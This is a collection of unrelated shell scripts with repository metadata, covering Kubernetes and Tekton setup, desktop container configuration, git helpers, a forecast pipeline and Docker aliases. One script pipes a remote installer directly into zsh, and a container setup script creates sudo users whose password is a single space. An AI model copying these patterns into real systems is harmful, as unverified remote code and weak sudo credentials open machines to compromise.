- lepidoptera_odb10
- hemiptera_odb10
- mollusca_odb10
- nematoda_odb10
- vertebrata_odb10
- actinopterygii_odb10
- cyprinodontiformes_odb10
- tetrapoda_odb10
- mammalia_odb10
- eutheria_odb10
- euarchontoglires_odb10
- glires_odb10
- primates_odb10
- laurasiatheria_odb10
- carnivora_odb10
- cetartiodactyla_odb10
- sauropsida_odb10
- aves_odb10
- passeriformes_odb10
- stramenopiles_odb10
- viridiplantae_odb10
- chlorophyta_odb10
- embryophyta_odb10
- liliopsida_odb10
- poales_odb10
- eudicots_odb10
- brassicales_odb10
- fabales_odb10
- solanales_odb10
viruses (no root dataset)
- alphaherpesvirinae_odb10
- baculoviridae_odb10
- rudiviridae_odb10
- betaherpesvirinae_odb10
- herpesviridae_odb10
- poxviridae_odb10
- tevenvirinae_odb10
- aviadenovirus_odb10
- enquatrovirus_odb10
- teseptimavirus_odb10
- bclasvirinae_odb10
- fromanvirus_odb10
- skunavirus_odb10
- betabaculovirus_odb10
- pahexavirus_odb10
- alphabaculovirus_odb10
- tunavirinae_odb10
- simplexvirus_odb10
- gammaherpesvirinae_odb10
- varicellovirus_odb10
- cheoctovirus_odb10
- guernseyvirinae_odb10
- tequatrovirus_odb10
- chordopoxvirinae_odb10
- peduovirus_odb10
- iridoviridae_odb10
- spounavirinae_odb10
#</opt_b>
#</option detail>
| true
|
af9be541d81becb7528c94196538b8128b095ab5
|
Shell
|
redbull05689/k1s
|
/join
|
UTF-8
| 248
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Prepare this node to join a Kubernetes cluster: pin the kubelet's
# advertised node IP, then (manually) append the kubeadm join command below.
IP="192.168.56.120"
# Writing under /etc requires root.
if [[ $EUID -ne 0 ]]; then echo "root required" 1>&2; exit 1; fi
cat << EOF > /etc/default/kubelet
KUBELET_EXTRA_ARGS="--node-ip=$IP"
EOF
# The kubeadm join command can be inserted here
| true
|
56257b1f8ee17279fabef5abee9ccffcf9c5512e
|
Shell
|
velcrine/lightmachine.dockerfile
|
/build-scripts/configuration.sh
|
UTF-8
| 4,184
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# here, we just provide configs for installed packages
set -ex
# Configure the LXDE desktop for new users (/etc/skel) and register it as
# the session to start.
lxde() {
#bug in lxpolkit, it says "session not found for pid of lxpolkit" https://github.com/meefik/linuxdeploy/issues/978
mv /usr/bin/lxpolkit /usr/bin/lxpolkit.bak
# Desktop/wallpaper settings for pcmanfm.
mkdir -p /etc/skel/.config/pcmanfm/LXDE/
echo "
[*]
wallpaper_mode=stretch
wallpaper_common=1
wallpaper=/dockerstation/wallpaper.jpg
" >/etc/skel/.config/pcmanfm/LXDE/desktop-items-0.conf
# Default text/plain files to mousepad.
echo '[Added Associations]
text/plain=mousepad.desktop;
' >/etc/skel/.config/mimeapps.list
# Desktop shortcut for the terminal.
echo "
[Desktop Entry]
Type=Link
Name=LXTerminal
Icon=lxterminal
URL=/usr/share/applications/lxterminal.desktop
" >/etc/skel/Desktop/lxterminal.desktop
echo "startlxde" >>/dockerstation/run-scripts/desktopenv.sh
}
# Configure the LXQt desktop for new users (/etc/skel) and register it as
# the session to start.
# NOTE(review): several double-quoted echo bodies contain backslash
# sequences (e.g. apps\1\desktop); they rely on echo printing backslashes
# literally — verify this holds on the target /bin/sh.
lxqt(){
# set theme icons and font; must for lxqt
mkdir -p /etc/skel/.config/lxqt
echo '
[General]
__userfile__=true
icon_theme=Adwaita
single_click_activate=false
theme=ambiance
tool_button_style=ToolButtonTextBesideIcon
[Qt]
doubleClickInterval=400
font="Sans,11,-1,5,50,0,0,0,0,0"
style=Fusion
wheelScrollLines=3
' >/etc/skel/.config/lxqt/lxqt.conf
# set wallpaper and properties
mkdir -p /etc/skel/.config/pcmanfm-qt/lxqt
echo '
[Desktop]
ShowHidden=true
Wallpaper=/dockerstation/wallpaper.jpg
WallpaperMode=stretch
' >/etc/skel/.config/pcmanfm-qt/lxqt/settings.conf
# add quicklaunch for terminal
echo "
[quicklaunch]
alignment=Left
apps\1\desktop=/usr/share/applications/qterminal_drop.desktop
apps\2\desktop=/usr/share/applications/pcmanfm-qt.desktop
apps\3\desktop=/usr/share/applications/juffed.desktop
apps\size=3
type=quicklaunch
" > /etc/skel/.config/lxqt/panel.conf
#qterminal shortcuts
mkdir -p /etc/skel/.config/qterminal.org/
echo '
[General]
AskOnExit=false
[Shortcuts]
Copy%20Selection="Ctrl+Shift+C, Ctrl+X"
Paste%20Clipboard="Ctrl+Shift+V, Ctrl+V"
' > /etc/skel/.config/qterminal.org/qterminal.ini
# Notification daemon placement; keep the panel off the blacklist popups.
echo "
[General]
__userfile__=true
blackList=lxqt-panel
placement=top-right
server_decides=1" > /etc/skel/.config/lxqt/notifications.conf
echo "startlxqt" >>/dockerstation/run-scripts/desktopenv.sh
}
# Prepare a D-Bus system bus and register gnome-session as the desktop.
gnome() {
#starting dbus; it supresses some warnings during running gnome-session
dbus-uuidgen >/var/lib/dbus/machine-id
mkdir -p /var/run/dbus
dbus-daemon --config-file=/usr/share/dbus-1/system.conf --print-address
echo "gnome-session" >>/dockerstation/run-scripts/desktopenv.sh
}
# Headless "node" flavor: no desktop; create users and extend the start
# script so a 'node' user shell is spawned at container start.
node() {
#keep image updated, as probably it is going to be used out of the box for development or debugging
apt-get update
# shipping with atleast a user to start with, if entrypoint is overriden
useradd -u 9998 -d /home/debug -G sudo -m -p "$(openssl passwd -1 " ")" -s /bin/bash debug
#creating a user with name "node" and password " "
# (user creation is deferred to runtime by appending to /usr/local/bin/start)
echo 'useradd -u 9999 -d /home/node -G sudo -m -p "$(openssl passwd -1 " ")" -s /bin/bash node' >> /usr/local/bin/start
echo "cd /home/node; sudo -u node /bin/bash" >>/usr/local/bin/start
}
# Shared setup for every flavor: skeleton directories and the container
# entrypoint script that chains init.sh -> app-init.sh -> desktopenv.sh.
common_config() {
mkdir /dockerstation/run-scripts
mkdir -p /etc/skel/.config/
mkdir -p /etc/skel/Desktop/
sh -c 'echo "*.log\n" >/etc/skel/.gitignore'
echo "#!/bin/sh
set -ex
# user can attach his own init.sh using docker's -v flag.
# but strict note must be followed that it should only follow the pattern in original init.sh
# for custom or additional setup use app-init.sh as done below
[ -e /dockerstation/run-scripts/init.sh ] && . /dockerstation/run-scripts/init.sh" > /dockerstation/run-scripts/entrypoint.sh
echo "
# user can provide any script here to create env for target app during init time
[ -e /dockerstation/run-scripts/app-init.sh ] && . /dockerstation/run-scripts/app-init.sh" >> /dockerstation/run-scripts/entrypoint.sh
# Launch the chosen desktop as the unprivileged user.
echo 'sudo -u ${USERNAME} sh /dockerstation/run-scripts/desktopenv.sh' >> /dockerstation/run-scripts/entrypoint.sh
chmod a+x /dockerstation/run-scripts/entrypoint.sh
}
# Dispatch on the requested flavor; each arm runs the shared config plus
# its flavor-specific setup and selects the default editor.
case "${1}" in
"gnome3")
common_config
gnome
editor=gedit
;;
"lxqt")
common_config
lxqt
editor=featherpad
;;
"lxde")
common_config
lxde
editor=mousepad
;;
"node")
common_config
node
editor=nano
;;
*)
# Bug fix: the usage message previously omitted the supported "lxqt" option.
echo "$0 [gnome3 | lxqt | lxde | node]"
exit 1
;;
esac
# Record the chosen editor system-wide.
echo "EDITOR=$editor" >/etc/environment
| true
|
9476a958ed31a3b527a92e3ce4ef47360885fced
|
Shell
|
oracle-quickstart/oci-ibm-spectrum-scale
|
/clients_only_cluster_scripts/deploy_spectrum_scale.sh
|
UTF-8
| 398
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -x
source /tmp/gpfs_env_variables.sh
# Build the GPFS portability layer. mmbuildgpl has been seen to fail
# intermittently, so retry with a 10s back-off until it succeeds.
until /usr/lpp/mmfs/bin/mmbuildgpl; do
sleep 10s
done
# Update the PATH environmental variable.
echo -e '\nexport PATH=/usr/lpp/mmfs/bin:$PATH' >> ~/.bash_profile
source ~/.bash_profile
exit 0
| true
|
bad67bf68f49182d402baede204184b6439aab72
|
Shell
|
Foxytine31/gitpush
|
/gitpush.sh
|
UTF-8
| 891
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Rebase the current feature branch onto an up-to-date master, merge it
# into master and push — restoring the feature branch afterwards.
set -e
RESET="\033[0m"
REDCOLOR="\033[31m"
GREENCOLOR="\033[32m"
# NOTE(review): parsing `git branch` output is fragile; current branch is
# the line marked with '*'. Consider `git rev-parse --abbrev-ref HEAD`.
current_branch=`git branch | awk '/\*/ {print $2}'`
clear
echo -e $GREENCOLOR"--------------------------------------- STARTING PUSH -------------------------------------------"$RESET
# Sequence: refresh master -> rebase feature on it -> fast-forward master
# with the feature -> push -> return to the feature branch. Any failure
# (typically a rebase conflict) falls into the error block below.
git checkout master && git pull origin master && git checkout $current_branch && git rebase master && git checkout master && git pull origin master && git merge $current_branch && git push origin master && git checkout $current_branch || {
echo -e $REDCOLOR"----------------------------------- PUSH FAILED (SEE ERRORS)-------------------------------------"$RESET;
echo -e $REDCOLOR"---- Most likely, you will just need to run 'git mergetool' and then 'git rebase --continue' ----"$RESET;
exit 1;
}
echo -e $GREENCOLOR"--------------------------------- PUSH AND REBASE SUCCESSFUL ------------------------------------"$RESET
| true
|
5295432ca63d2c44e25d7623060ae7cf8be76da8
|
Shell
|
Chrismarsh/SnowCast
|
/NWP_Forcing/Update_GDPS.sh
|
UTF-8
| 1,588
| 3.359375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
# SnowCast pipeline driver: download the GDPS forecast, convert it to CHM
# forcing files and run CHM for the available period. Intended to be run
# from cron.
# Stop of get any simple error
set -e
# This is needed because crontab does not have same env variables are user
PATH=$PATH:/home/nwayand/custom/anaconda2:/home/nwayand/custom/anaconda2/bin:/home/nwayand/custom/anaconda2/bin
# Timer
start=$SECONDS
## Script paths
# Where scripts are located
ex_dir=/home/nwayand/SnowCast/NWP_Forcing/
# CHM run dir
CHM_dir=/home/nwayand/snow_models/output_CHM/SnowCast/CHM_Configs/
# Config file to use
#Configfile=Config_GEM_west_fortress.py
Configfile=Configs/Config_GDPS_append.py
# Download GEM forecast
echo Downloading GEM
/home/nwayand/custom/anaconda2/bin/python $ex_dir"Download/Download_GDPS_GRIB2.py" $ex_dir$Configfile
# Subset grib2 files (global) to Canada
echo Subsetting GDPS grib2 files
/home/nwayand/SnowCast/NWP_Forcing/Util/sub_set_grib2_files.sh /media/data3/nicway/GEM/GDPS/grib2_current
# Format grib2 to netcdf
# (uses the separate 'pynio' conda environment for the GRIB reader)
echo Formating grib2 to netcdf
/home/nwayand/custom/anaconda2/envs/pynio/bin/python $ex_dir"GRIB2_to_NETCDF/GRIB2_GDPS_to_Netcdf.py" $ex_dir$Configfile
# Convert archived netcdf to CHM forcing
echo NETCDF to CHM ASCII Forcing
/home/nwayand/custom/anaconda2/bin/python $ex_dir"NETCDF_to_CHM_ASCII/Netcdf_Day_Chunk_to_CHM_forcing_GDPS.py" $ex_dir$Configfile
##/home/nwayand/custom/anaconda2/bin/python $ex_dir"Netcdf_Day_Chunk_to_CHM_forcing.py" $ex_dir$Configfile
##/home/nwayand/custom/anaconda2/bin/python $ex_dir"Netcdf_to_CHM_forcing.py" $ex_dir$Configfile
# Run CHM for available forcing period
$CHM_dir"Run_GDPS_CHM_Current.sh"
duration=$(( SECONDS - start ))
echo Took $duration seconds
| true
|
d7690c60f95fbf9baa908fa3afb056d6d20becac
|
Shell
|
pixelastic/oroshi
|
/scripts/bin/text-trim
|
UTF-8
| 233
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
# Trim starting and trailing whitespace from a string
# Read from arg or from pipe
local input=$1
[[ -p /dev/stdin ]] && input="$(cat -)"
# Bug fix: use printf with a quoted argument instead of unquoted echo, so
# inputs like "-n" or glob characters ('*') pass through verbatim.
# awk's "$1=$1" reassignment squeezes runs of whitespace and trims the ends.
printf '%s\n' "$input" | awk '{$1=$1;print}'
| true
|
b77830a32ba528802768116b0206304bb12acc78
|
Shell
|
RIAPS/riaps-pycom
|
/src/scripts/riaps-dev.ctrl
|
UTF-8
| 350
| 2.515625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# For riaps app developers:
# Starts up the riaps controller on the mininet
# To be run on the 'lead' node
# Add default gateway
route add default gw 10.0.0.1
# Start registry - start it on one node only
/usr/local/bin/rpyc_registry.py &
# Change to (non-privileged) user and run the controller
# (command -v is the POSIX replacement for `which`; quote the user name)
sudo -E -u "$SUDO_USER" "$(command -v riaps_ctrl)"
| true
|
97536ae7f2980b35c3625ef350dad516f17228fd
|
Shell
|
nguyenduclong-ict/linux_development--Lap-trinh-Linux-
|
/Bai7(2)/tam_giac_so
|
UTF-8
| 154
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Print a number triangle: row i holds the next i consecutive integers,
# each followed by two spaces.
sott=1
row=1
while (( row <= 4 )); do
  col=1
  while (( col <= row )); do
    printf '%s  ' "$sott"
    (( sott++ ))
    (( col++ ))
  done
  echo
  (( row++ ))
done
exit 0
| true
|
6f89fd0f03550cd32115afe72ee6a61df07f187b
|
Shell
|
kin0025/COSC1076-A2
|
/testfiles
|
UTF-8
| 253
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
#Search for line number length
for f in *.c *.h; do
# printf instead of 'echo -en': -e/-n are bashisms and unreliable under
# /bin/sh; this prints the filename, a space and a tab with no newline.
printf '%s \t' "$f"
awk '{print length, $0}' "$f" 2>/dev/null| sort -nr | head -1
done
echo
#Checks for unix line endings
file *.c *.h
#Search for unedited headers
grep "EDIT HERE" *.c *.h
| true
|
6457507c405b0fd1c4acc020a6a71967c351ec27
|
Shell
|
jsoverson/dotfiles
|
/install/linux/zulu
|
UTF-8
| 167
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# Install wabt (via the zulu installer) unless wasm2wat is already available.
set -e
# Original used '[[ ! -x wasm2wat ]]', which tests for an executable file
# named 'wasm2wat' in the *current directory* instead of searching $PATH.
if ! command -v wasm2wat > /dev/null; then
  curl -L https://zulu.molovo.co/install | zsh && zsh
else
  echo "Found wasm2wat in path, not reinstalling wabt"
fi
| true
|
14cce081f50de4d98e7136d84b7116f767614be5
|
Shell
|
AlanGreene/katacoda-scenarios
|
/tekton-playground-kubernetes/background.sh
|
UTF-8
| 11,723
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Katacoda background task: boot the cluster, then install Tekton.
# Progress is signalled to the foreground scenario via marker files in /opt.
# Start Kubernetes
echo "Starting cluster"
launch.sh
echo "done" >> /opt/.clusterstarted
echo "Installing Tekton Pipelines"
kubectl apply --filename https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.13.2/release.yaml
# Backing directory for the hostPath PersistentVolume applied just below
mkdir /mnt/data
kubectl apply -f - << EOF
apiVersion: v1
kind: PersistentVolume
metadata:
name: task-pv-volume
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/mnt/data"
EOF
# Re-create the artifact-PVC config so Tekton uses the 'manual' storage
# class backed by the hostPath volume created above
kubectl delete configmap/config-artifact-pvc -n tekton-pipelines
kubectl create configmap config-artifact-pvc --from-literal=storageClassName=manual -n tekton-pipelines
echo "done" >> /opt/.pipelinesinstalled
echo "Installing Tekton Dashboard"
# kubectl apply --filename https://github.com/tektoncd/dashboard/releases/download/v0.7.0/tekton-dashboard-release.yaml
kubectl apply -f - << EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: extensions.dashboard.tekton.dev
spec:
group: dashboard.tekton.dev
names:
categories:
- tekton
- tekton-dashboard
kind: Extension
plural: extensions
scope: Namespaced
subresources:
status: {}
version: v1alpha1
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-backend
rules:
- apiGroups:
- apiextensions.k8s.io
resources:
- customresourcedefinitions
verbs:
- get
- list
- apiGroups:
- security.openshift.io
resources:
- securitycontextconstraints
verbs:
- use
- apiGroups:
- route.openshift.io
resources:
- routes
verbs:
- get
- list
- apiGroups:
- extensions
- apps
resources:
- ingresses
verbs:
- get
- list
- watch
- apiGroups:
- ""
resources:
- services
verbs:
- get
- list
- watch
- apiGroups:
- dashboard.tekton.dev
resources:
- extensions
verbs:
- get
- list
- watch
- apiGroups:
- tekton.dev
resources:
- clustertasks
- clustertasks/status
verbs:
- get
- list
- watch
- apiGroups:
- triggers.tekton.dev
resources:
- clustertriggerbindings
verbs:
- get
- list
- watch
- apiGroups:
- dashboard.tekton.dev
resources:
- extensions
verbs:
- create
- update
- delete
- patch
- apiGroups:
- tekton.dev
resources:
- clustertasks
- clustertasks/status
verbs:
- create
- update
- delete
- patch
- apiGroups:
- triggers.tekton.dev
resources:
- clustertriggerbindings
verbs:
- create
- update
- delete
- patch
- add
---
aggregationRule:
clusterRoleSelectors:
- matchLabels:
rbac.dashboard.tekton.dev/aggregate-to-dashboard: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-extensions
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-pipelines
rules:
- apiGroups:
- apps
resources:
- deployments
verbs:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-tenant
rules:
- apiGroups:
- ""
resources:
- serviceaccounts
- pods/log
- namespaces
verbs:
- get
- list
- watch
- apiGroups:
- tekton.dev
resources:
- tasks
- taskruns
- pipelines
- pipelineruns
- pipelineresources
- conditions
- tasks/status
- taskruns/status
- pipelines/status
- pipelineruns/status
- taskruns/finalizers
- pipelineruns/finalizers
verbs:
- get
- list
- watch
- apiGroups:
- triggers.tekton.dev
resources:
- eventlisteners
- triggerbindings
- triggertemplates
verbs:
- get
- list
- watch
- apiGroups:
- ""
resources:
- serviceaccounts
verbs:
- update
- patch
- apiGroups:
- ""
resources:
- secrets
verbs:
- get
- list
- watch
- create
- update
- delete
- apiGroups:
- tekton.dev
resources:
- tasks
- taskruns
- pipelines
- pipelineruns
- pipelineresources
- conditions
- taskruns/finalizers
- pipelineruns/finalizers
- tasks/status
- taskruns/status
- pipelines/status
- pipelineruns/status
verbs:
- create
- update
- delete
- patch
- apiGroups:
- triggers.tekton.dev
resources:
- eventlisteners
- triggerbindings
- triggertemplates
verbs:
- create
- update
- delete
- patch
- add
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-triggers
rules:
- apiGroups:
- apps
resources:
- deployments
verbs:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-backend
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-backend
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-extensions
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-extensions
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-pipelines
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-pipelines
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-tenant
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-tenant
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/part-of: tekton-dashboard
name: tekton-dashboard-triggers
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: tekton-dashboard-triggers
subjects:
- kind: ServiceAccount
name: tekton-dashboard
namespace: tekton-pipelines
---
apiVersion: v1
kind: Service
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
dashboard.tekton.dev/release: v0.7.0
version: v0.7.0
name: tekton-dashboard
namespace: tekton-pipelines
spec:
ports:
- name: http
port: 9097
protocol: TCP
targetPort: 9097
selector:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
dashboard.tekton.dev/release: v0.7.0
version: v0.7.0
name: tekton-dashboard
namespace: tekton-pipelines
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
template:
metadata:
labels:
app: tekton-dashboard
app.kubernetes.io/component: dashboard
app.kubernetes.io/instance: default
app.kubernetes.io/name: dashboard
app.kubernetes.io/part-of: tekton-dashboard
app.kubernetes.io/version: v0.7.0
name: tekton-dashboard
spec:
containers:
- args:
- --port=9097
- --web-dir=/var/run/ko
- --csrf-secure-cookie=false
env:
- name: INSTALLED_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: index.docker.io/alangreene/dashboard-9623576a202fe86c8b7d1bc489905f86@sha256:bcb53087bd17bb66f38fdc8a0e48ce9a4ae9d98c3a40890f263ba3b7073d31ff
livenessProbe:
httpGet:
path: /health
port: 9097
name: tekton-dashboard
ports:
- containerPort: 9097
readinessProbe:
httpGet:
path: /readiness
port: 9097
securityContext:
runAsNonRoot: true
serviceAccountName: tekton-dashboard
volumes: []
---
EOF
echo "done" >> /opt/.dashboardinstalled
echo "Installing Tekton CLI"
# Fetch a pinned tkn release and drop the binary straight into /usr/local/bin
curl -LO https://github.com/tektoncd/cli/releases/download/v0.10.0/tkn_0.10.0_Linux_x86_64.tar.gz
tar xvzf tkn_0.10.0_Linux_x86_64.tar.gz -C /usr/local/bin/ tkn
echo "done" >> /opt/.tkninstalled
echo "Waiting for Tekton pods to be ready"
kubectl wait pod -n tekton-pipelines --all --for=condition=Ready --timeout=90s
echo "done" >> /opt/.podsready
echo "Configure ingress"
# kubectl create ns nginx-ingress
# helm repo add stable https://kubernetes-charts.storage.googleapis.com
# helm install --namespace nginx-ingress nginx-ingress stable/nginx-ingress
# # helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
# # helm install --namespace ingress-nginx ingress-nginx ingress-nginx/ingress-nginx
# kubectl wait --namespace nginx-ingress \
# --for=condition=ready pod \
# --selector=app.kubernetes.io/component=controller \
# --timeout=120s
# # kubectl --namespace ingress-nginx get services -o wide -w ingress-nginx-controller
# kubectl apply -f - << EOF
# apiVersion: networking.k8s.io/v1beta1
# kind: Ingress
# metadata:
# name: tekton-dashboard
# namespace: tekton-pipelines
# spec:
# backend:
# serviceName: tekton-dashboard
# servicePort: 9097
# EOF
# Ingress was abandoned in favour of a plain background port-forward so the
# dashboard is reachable on :9097 of the host
kubectl --namespace tekton-pipelines port-forward --address=0.0.0.0 service/tekton-dashboard 9097:9097 &
echo "done" >> /opt/.ingressconfigured
echo "done" >> /opt/.backgroundfinished
| true
|
11c22e7c23aaac44543d12c11e84bbdd5fdafa3f
|
Shell
|
mingyanisa/fanboi2
|
/vendor/vagrant/bootstrap_builder.sh
|
UTF-8
| 1,240
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh
# Vagrant provisioner: install Docker, the img builder, and the Google
# Cloud SDK on a Debian guest. Runs as root; -x traces, -e aborts on error.
set -xe
apt-get update
apt-get install -y \
apt-transport-https \
ca-certificates \
curl \
dirmngr \
gnupg2 \
software-properties-common
#
# Docker
#
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
apt-get update
apt-get install -y docker-ce docker-compose
systemctl enable docker
systemctl start docker
# Allow the vagrant user to talk to the Docker daemon without sudo
usermod -aG docker vagrant
#
# IMG
#
apt-get update
apt-get install -y libseccomp-dev uidmap
# Enable unprivileged user namespaces, required for rootless img builds
echo 1 > /proc/sys/kernel/unprivileged_userns_clone
_img_sha256="6b7b660fa0a4c4ab10aa2c2d7d586afdbc70cb33644995b0ee0e7f77ddcc2565"
_img_version="v0.5.4"
# Download a pinned img release and verify its checksum before enabling it
curl -fSL "https://github.com/genuinetools/img/releases/download/$_img_version/img-linux-amd64" -o "/usr/local/bin/img" \
&& echo "${_img_sha256} /usr/local/bin/img" | sha256sum -c - \
&& chmod a+x "/usr/local/bin/img"
#
# Google Cloud SDK
#
curl -fsSL https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
apt-add-repository "deb [arch=amd64] http://packages.cloud.google.com/apt cloud-sdk-$(lsb_release -c -s) main"
apt-get update
apt-get install -y google-cloud-sdk
| true
|
c8f3211b051199fec9a21bd892338cf76c025439
|
Shell
|
gdetrez/bnfctest
|
/testbnfc.sh
|
UTF-8
| 456
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/sh
# Smoke-test a bnfc binary (path in $1, default 'bnfc'): generate a small
# calculator grammar in a throw-away directory, run bnfc and build the result.
set -eu
set -v
BNFC=${1:-bnfc}
TMPDIR=$(mktemp -d)
trap 'echo "removing $TMPDIR"; rm -rf ${TMPDIR}' INT TERM EXIT
cd "${TMPDIR}"
# Same grammar as before, written in one heredoc instead of repeated echoes
cat > Calc.cf <<'EOF'
EAdd. Exp ::= Exp "+" Exp1 ;
ESub. Exp ::= Exp "-" Exp1 ;
EMul. Exp1 ::= Exp1 "*" Exp2 ;
EDiv. Exp1 ::= Exp1 "/" Exp2 ;
EInt. Exp2 ::= Integer ;
coercions Exp 2 ;
EOF
${BNFC} -m Calc.cf
make
| true
|
4a15e6d25593473451c97960acda417d1e8984cd
|
Shell
|
Alegarse/Scripts-de-Linux
|
/ejercicio07.sh
|
UTF-8
| 123
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Create a directory named after the first argument.
# Fail early with a usage message when no name was given (previously
# 'mkdir ""' produced only a confusing mkdir error and the script went on).
if [ -z "$1" ]; then
  echo "Uso: $0 <nombre_de_directorio>" >&2
  exit 1
fi
echo "Script que crea un directorio con el nombre que introduzcas"
mkdir "$1"
echo "El nombre elegido es: $1"
| true
|
0d435ede8a6603806d55d1200b7fd1d5c2d15cfc
|
Shell
|
Arbazbms/5thSem-DS-Algo-CN-AI-UNIX-
|
/USP_LAB/calculator.sh
|
UTF-8
| 97
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
# Read an arithmetic expression from the user and evaluate it with bc.
echo "Enter the expression"
# -r keeps backslashes literal; quoting "$exp" below is the real fix:
# unquoted, an expression such as 2*3 was glob-expanded against files in
# the current directory before ever reaching bc.
read -r exp
result=$(echo "$exp" | bc)
echo "result: $result"
| true
|
2ca872bea3779cb770549f2c9f4c5e936a546f7e
|
Shell
|
akarzim/zsh-docker-aliases
|
/docker-aliases.plugin.zsh
|
UTF-8
| 1,020
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#
# Defines Docker aliases.
#
# Author:
#   François Vantomme <akarzim@gmail.com>
#
# zsh plugin: '(( $+commands[name] ))' is a zsh-ism that tests whether
# 'name' exists in $PATH; top-level 'return' works because this file is
# sourced, not executed.
# Return if requirements are not found.
if (( ! $+commands[docker] )); then
  return 1
fi
#
# Functions
#
# Set Docker Machine environment
# Usage: dkme MACHINE - imports `docker-machine env MACHINE` into the shell
function dkme {
  if (( ! $+commands[docker-machine] )); then
    return 1
  fi
  eval $(docker-machine env $1)
}
# Set Docker Machine default machine
# Usage: dkmd MACHINE - symlinks MACHINE to 'default' under
